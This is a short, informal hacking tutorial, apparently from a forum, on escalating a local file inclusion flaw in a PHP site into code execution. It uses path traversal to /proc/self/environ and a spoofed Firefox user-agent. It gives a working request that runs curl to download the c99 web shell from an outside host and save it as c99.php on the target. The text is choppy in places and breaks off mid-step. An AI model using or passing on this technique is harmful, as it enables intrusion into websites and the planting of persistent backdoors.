1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ
If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs :D
Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?
Open a new tab in Mozilla,and type "about:config" (without quotes)...
Now,in "Filter" type: general.useragent.extra.firefox
You will get something like this:
Preference name Status Type Value general.useragent.extra.firefox default string Firefox/3.0.7
Instead of typing
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php
Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...
Now simply go to your site like this: